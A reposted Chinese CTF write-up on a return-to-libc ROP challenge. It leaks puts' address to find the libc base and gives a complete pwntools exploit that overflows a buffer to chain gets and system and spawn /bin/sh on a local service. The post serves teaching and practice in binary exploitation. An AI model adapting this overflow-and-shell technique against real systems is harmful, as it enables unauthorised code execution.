pwn-ROP(2)

其他 2018-06-13 21:32:50 阅读次数: 2

通过int80系统只对静态编译有效,动态编译需要用其他方法

本题提供了一个地址输入端,输入函数地址会返回该函数的实际地址,我们用得到的实际地址-偏移地址=基地址,然后用基地址+任意函数的偏移地址就可以得到实际地址,就可以调用gets、system等函数,利用溢出点传入shell。

首先,用objdump看一下用到的puts函数的跳转地址

exp中先传入0x804a01c,会得到一个实际地址,把这个地址先保存起来,再用命令找到puts的偏移地址

得到偏移地址0x0064da0,用得到的实际地址-偏移地址,这样就得到了基地址。同样可以得到gets、system的偏移地址,加上基地址,得到实际地址,程序之后会有一个输入点,用溢出即可传入shell

exp:

 1 from pwn import *
 2 
 3 r = remote('127.0.0.1',4000)
 4 
 5 puts_got_plt = 0x804a01c
 6 puts_off = 0x0064da0
 7 
 8 r.recvuntil(':')
 9 r.sendline(str(puts_got_plt))
10 r.recvuntil(':')
11 libc_base = int(r.recvuntil('\n').strip(),16) - puts_off
12 print 'Libc base addr :' + hex(libc_base)                 #得到基地址
13 
14 gets_off = 0x0064440
15 system_off = 0x003fe70 
16 
17 buf = 0x0804a048 - 50
18 
19 gets = libc_base +gets_off
20 system = libc_base +system_off
21 
22 rop=[
23     gets,
24     system,
25     buf,
26     buf
27 
28 ]
29 
30 r.recvuntil(':')
31 r.sendline('a'*60+flat(rop))             #溢出点
32 sleep(2)
33 r.sendline('/bin/sh\x00')                 #传入shell
34 
35 
36 r.interactive()

猜你喜欢

转载自www.cnblogs.com/Aiden-/p/9180177.html
ROP
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022